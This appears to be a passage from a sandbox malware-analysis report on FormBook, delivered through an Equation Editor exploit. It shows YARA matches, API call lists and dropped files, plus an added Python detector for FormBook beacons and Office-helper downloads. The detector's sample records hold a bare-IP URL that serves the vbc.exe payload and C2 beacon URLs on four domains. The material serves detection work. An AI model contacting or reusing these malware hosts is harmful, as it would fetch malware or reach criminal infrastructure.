Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F
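The network entries above show the two things a detection engineer would want to catch from this chain: EQNEDT32.EXE fetching vbc.exe from a bare IP (URLDownloadToFileW followed by ShellExecuteW), and the FormBook check-ins that keep the same path (/nc39/) and the same trailing parameter (3f=j6AdrVwh) while rotating across four unrelated domains. The following Python is an added example, not part of the Joe Sandbox report or the sample: it runs both checks over constructed request records shaped like the entries above. The record field names, the MIN_HOSTS threshold, the helper-process list, the process attribution for the beacons (None, since the report names no process for them) and the benign firefox.exe record used for contrast are all assumptions.

```python
"""Added example (not from the sandbox report): two detections run over constructed
HTTP request records shaped like the report's "HTTP traffic detected" entries.

1. beacon_clusters(): FormBook check-ins keep one URI path and one fixed trailing
   query parameter (here 3f=j6AdrVwh) while rotating through unrelated domains.
   Group requests by that shape and flag any shape seen against >= MIN_HOSTS hosts.
2. office_helper_downloads(): an executable fetched by an Office helper such as
   EQNEDT32.EXE, or any request it makes to a bare IP, is the Equation Editor
   exploit's URLDownloadToFileW -> ShellExecuteW chain seen in this report.
Field names, thresholds and the benign contrast record are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

MIN_HOSTS = 3  # assumed threshold: distinct hosts sharing one request shape
HELPER_PROCESSES = {"eqnedt32.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed records. The first five mirror the requests in the report; the
# last is a benign request added for contrast. The report attributes the
# vbc.exe fetch to EQNEDT32.EXE but names no process for the /nc39/ beacons,
# so those carry process=None.
SAMPLE = [
    {"process": "EQNEDT32.EXE", "request": "GET /75/vbc.exe HTTP/1.1",
     "host": "104.168.33.31", "connection": "Keep-Alive"},
    {"process": None, "request": "GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1",
     "host": "www.arjimni.com", "connection": "close"},
    {"process": None, "request": "GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1",
     "host": "www.contractornurd.com", "connection": "close"},
    {"process": None, "request": "GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1",
     "host": "www.tw-life.net", "connection": "close"},
    {"process": None, "request": "GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1",
     "host": "www.yiwanggkm.com", "connection": "close"},
    {"process": "firefox.exe", "request": "GET /firefox/52.0.1/releasenotes HTTP/1.1",
     "host": "www.mozilla.org", "connection": "keep-alive"},
]


def request_shape(rec):
    """Method, path, parameter count and the last (name, value) pair: the parts a
    FormBook-style beacon keeps constant while the first parameter (the encoded
    payload) and the Host header rotate."""
    method, target, _version = rec["request"].split(" ", 2)
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    last = params[-1] if params else None
    return (method, parts.path, len(params), last)


def beacon_clusters(records, min_hosts=MIN_HOSTS):
    """Map each request shape to the sorted hosts it was sent to, keeping only
    shapes that reach at least min_hosts distinct hosts. Only short-lived
    'Connection: close' requests are considered, as in the beacons above."""
    hosts_by_shape = defaultdict(set)
    for rec in records:
        if rec.get("connection", "").lower() != "close":
            continue
        hosts_by_shape[request_shape(rec)].add(rec["host"].lower())
    return {shape: sorted(hosts)
            for shape, hosts in hosts_by_shape.items() if len(hosts) >= min_hosts}


def office_helper_downloads(records):
    """(process, host, path) for every request an Office helper process made
    that fetches a PE by extension or talks to a bare IP instead of a hostname."""
    hits = []
    for rec in records:
        proc = (rec.get("process") or "").lower()
        if proc not in HELPER_PROCESSES:
            continue
        _method, target, _version = rec["request"].split(" ", 2)
        path = urlsplit(target).path
        if path.lower().endswith((".exe", ".dll", ".scr")) or BARE_IP.match(rec["host"]):
            hits.append((proc, rec["host"], path))
    return hits


if __name__ == "__main__":
    for shape, hosts in beacon_clusters(SAMPLE).items():
        print("beacon shape", shape, "-> hosts:", ", ".join(hosts))
    for proc, host, path in office_helper_downloads(SAMPLE):
        print(f"office helper download: {proc} fetched {path} from {host}")
```

Grouping on the last parameter rather than the first matters here: the dZzp value differs in every beacon (it carries the encoded check-in data), while 3f=j6AdrVwh is constant across all four hosts, so the constant part is what ties the domains together. The second check deliberately fires on the bare-IP Host alone, so it would still catch a download whose path hides the extension.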

E-Banking Fraud

Source: Yara match File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B1890 5_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BC3BD 5_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BA184 5_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BB3F1 5_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B9C12 5_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B96A0 5_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B7E88 5_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_00110A41 5_2_00110A41
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E1F5 6_2_0041E1F5
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E9FF 6_2_0041E9FF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00409220 6_2_00409220
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0040DBC0 6_2_0040DBC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041DBBD 6_2_0041DBBD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402D89 6_2_00402D89
